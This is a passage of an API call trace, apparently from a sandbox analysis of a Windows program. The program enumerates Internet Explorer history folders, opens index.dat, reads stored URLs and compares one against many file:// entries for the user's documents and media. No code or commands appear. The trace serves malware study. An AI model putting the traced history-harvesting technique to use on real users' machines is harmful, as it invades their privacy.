yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low" [0085.841] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x44 [0085.841] wcscat (in: _Dest=0x2897f8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\" [0085.841] wcscat (in: _Dest=0x2897f8, _Source="." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\.") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\." [0085.841] wcscmp (_String1=".", _String2="..") returned -1 [0085.841] wcscmp (_String1=".", _String2=".") returned 0 [0085.841] _wcsicmp (_String1=".", _String2="index.dat") returned -59 [0085.841] FindNextFileW (in: hFindFile=0x58e8a8, lpFindFileData=0x2895a8 | out: lpFindFileData=0x2895a8) returned 1 [0085.841] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x44 [0085.841] wcslen (_String="..") returned 0x2 [0085.842] wcscpy (in: _Dest=0x2897f8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low" [0085.842] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x44 [0085.842] wcscat (in: _Dest=0x2897f8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\" [0085.842] wcscat (in: _Dest=0x2897f8, _Source=".." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\..") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\.." [0085.842] wcscmp (_String1="..", _String2="..") returned 0 [0085.842] _wcsicmp (_String1="..", _String2="index.dat") returned -59 [0085.842] FindNextFileW (in: hFindFile=0x58e8a8, lpFindFileData=0x2895a8 | out: lpFindFileData=0x2895a8) returned 1 [0085.842] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x44 [0085.842] wcslen (_String="desktop.ini") returned 0xb [0085.842] wcscpy (in: _Dest=0x2897f8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low" [0085.842] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x44 [0085.842] wcscat (in: _Dest=0x2897f8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\" [0085.842] wcscat (in: _Dest=0x2897f8, _Source="desktop.ini" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\desktop.ini") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\desktop.ini" [0085.842] _wcsicmp (_String1="desktop.ini", _String2="index.dat") returned -5 [0085.842] FindNextFileW (in: hFindFile=0x58e8a8, lpFindFileData=0x2895a8 | out: lpFindFileData=0x2895a8) returned 1 [0085.842] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x44 [0085.842] wcslen (_String="History.IE5") returned 0xb [0085.842] wcscpy (in: _Dest=0x2897f8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low" [0085.842] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x44 [0085.842] wcscat (in: _Dest=0x2897f8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\" [0085.842] wcscat (in: _Dest=0x2897f8, _Source="History.IE5" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" [0085.842] wcscmp (_String1="History.IE5", _String2="..") returned 1 [0085.842] wcscmp (_String1="History.IE5", _String2=".") returned 1 [0085.842] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x50 [0085.842] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x50 [0085.842] wcslen (_String="*.*") returned 0x3 [0085.842] wcscpy (in: _Dest=0x288924, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" [0085.842] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x50 [0085.842] wcscat (in: _Dest=0x288924, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\" [0085.842] wcscat (in: _Dest=0x288924, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\*.*" [0085.842] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\*.*", lpFindFileData=0x288bac | out: lpFindFileData=0x288bac) returned 0x58e8e8 [0085.853] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x50 [0085.853] wcslen (_String=".") returned 0x1 [0085.853] wcscpy (in: _Dest=0x288dfc, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" [0085.853] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x50 [0085.853] wcscat (in: _Dest=0x288dfc, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\" [0085.854] wcscat (in: _Dest=0x288dfc, _Source="." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\.") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\." [0085.854] wcscmp (_String1=".", _String2="..") returned -1 [0085.854] wcscmp (_String1=".", _String2=".") returned 0 [0085.854] _wcsicmp (_String1=".", _String2="index.dat") returned -59 [0085.854] FindNextFileW (in: hFindFile=0x58e8e8, lpFindFileData=0x288bac | out: lpFindFileData=0x288bac) returned 1 [0085.854] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x50 [0085.854] wcslen (_String="..") returned 0x2 [0085.854] wcscpy (in: _Dest=0x288dfc, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" [0085.854] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x50 [0085.854] wcscat (in: _Dest=0x288dfc, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\" [0085.854] wcscat (in: _Dest=0x288dfc, _Source=".." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\..") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\.." [0085.854] wcscmp (_String1="..", _String2="..") returned 0 [0085.854] _wcsicmp (_String1="..", _String2="index.dat") returned -59 [0085.854] FindNextFileW (in: hFindFile=0x58e8e8, lpFindFileData=0x288bac | out: lpFindFileData=0x288bac) returned 1 [0085.854] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x50 [0085.854] wcslen (_String="desktop.ini") returned 0xb [0085.854] wcscpy (in: _Dest=0x288dfc, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" [0085.854] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x50 [0085.854] wcscat (in: _Dest=0x288dfc, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\" [0085.854] wcscat (in: _Dest=0x288dfc, _Source="desktop.ini" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\desktop.ini") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\desktop.ini" [0085.854] _wcsicmp (_String1="desktop.ini", _String2="index.dat") returned -5 [0085.854] FindNextFileW (in: hFindFile=0x58e8e8, lpFindFileData=0x288bac | out: lpFindFileData=0x288bac) returned 1 [0085.854] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x50 [0085.854] wcslen (_String="index.dat") returned 0x9 [0085.854] wcscpy (in: _Dest=0x288dfc, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" [0085.854] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x50 [0085.854] wcscat (in: _Dest=0x288dfc, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\" [0085.854] wcscat (in: _Dest=0x288dfc, _Source="index.dat" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat" [0085.854] _wcsicmp (_String1="index.dat", _String2="index.dat") returned 0 [0085.854] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa0 [0085.856] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.856] ReadFile (in: hFile=0xa0, lpBuffer=0x28887c, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x282544, lpOverlapped=0x0 | out: lpBuffer=0x28887c*, lpNumberOfBytesRead=0x282544*=0x20, lpOverlapped=0x0) returned 1 [0085.873] GetFileSize (in: hFile=0xa0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8000 [0085.873] SetFilePointer (in: hFile=0xa0, lDistanceToMove=20480, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5000 [0085.873] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.873] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.873] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.873] _strlwr (in: _Str="http://www.msn.com/" | out: _Str="http://www.msn.com/") returned="http://www.msn.com/" [0085.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867fd, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="http://www.msn.com/") returned 20 [0085.873] wcscmp (_String1="http://www.msn.com/", _String2=":host: computer") returned 1 [0085.873] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8~1/desktop/sample_file.doc") returned 1 [0085.873] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/o%201bunagzfik.flv") returned 1 [0085.873] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4q6akwegf.mkv") returned 1 [0085.873] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cs-nayun66m1kj0qh.flv") returned 1 [0085.873] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/kdgk.docx") returned 1 [0085.873] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/txcexlftylq2o.gif") returned 1 [0085.873] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/lxcfr82x4aq4uswn.mkv") returned 1 [0085.873] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/y0vxikbyowmim.gif") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/x-baj.mkv") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/gm13ifqvw%20o2ca5sqcfu.gif") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/crxv%20j7wkoocqrc.flv") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ggxj998_.flv") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/pvp12cuh1.mkv") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/hsii3%20s6wx.ots") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ivpbf2a6zwg8th8g0v.swf") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ym9tcvsa3hy3_sch.swf") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/ncgtsu2wgq6.bmp") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/yzvsri7wb0.pdf") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/nnkxqyu2c.bmp") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/cvm_.jpg") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/uwefm1na-dsdirw%20v7.bmp") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/saeibjk2.odp") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/pjm8g%20hd0vdm.docx") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/jbjbayjalmaqe.jpg") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/p0mmc6mktcpt8jz.ots") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/xqiysgiqzh.swf") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/shcj2ukhha9e2.png") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/0ivkoykeh0-af8.png") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/zwfvn9iebk6wzpag.mkv") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/v0ufl0ag.flv") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/a3ne_yxum0cld.csv") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/6fshffojtwspry33.ppt") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/hby7gwij.doc") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/uhtkq-tczvm9tdvxvw.flv") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/28laxbsq3m50.jpg") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/xcj9p.jpg") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/gxv2c5bzmuai647pclru.xlsx") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/w5qvdpae9jrz.pdf") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/kvgo2ps.odt") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lu_nzwrgi2ssxtfhhhg.swf") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/c9v5cwhsfounz.png") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/g5ve1ybcahauz0t.gif") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/3sc0z1bfbrlsq.ppt") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ohxnykh_ufz4.gif") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/2n_gtpylh.odt") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/dc0kkkmref9xs.swf") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bbuhdsebor_wx0_ly.flv") returned 1 [0085.874] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/neiwqsqwjb.docx") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/i-vzxxaq.ppt") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/s%201xjks5rgwiostrv.flv") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ie86ieikrrj2tctdthln.flv") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cthtm1stuuxwdzgs.swf") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/keqrajwwgkvsr.bmp") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/xad6dacxjlfsnkrl.mkv") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9zd4.pptx") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/uprrnkocaj.swf") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/ycpzmkirbkzdd83zh.pps") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bgq5sdc_j4q1pn3g.mkv") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/meivqh73.jpg") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/kfcaijye4jotjfgcvvz.docx") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/v8zjpd1uv_.bmp") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/7ulx.jpg") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/kpuzfgcfs9u.swf") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/olv5jdb-ffdifmwqcs.docx") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/rnvh3h9ck0e39pnq.pdf") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/mik5.xlsx") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/zqr7exbiokjx.mkv") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/gvvprgs0c.png") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/bqip4gzdrig20x.png") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/imjmunevalj.bmp") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/kqayysruimuhur.gif") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/vw6xls.xlsx") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9wzlbboc.xlsx") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", 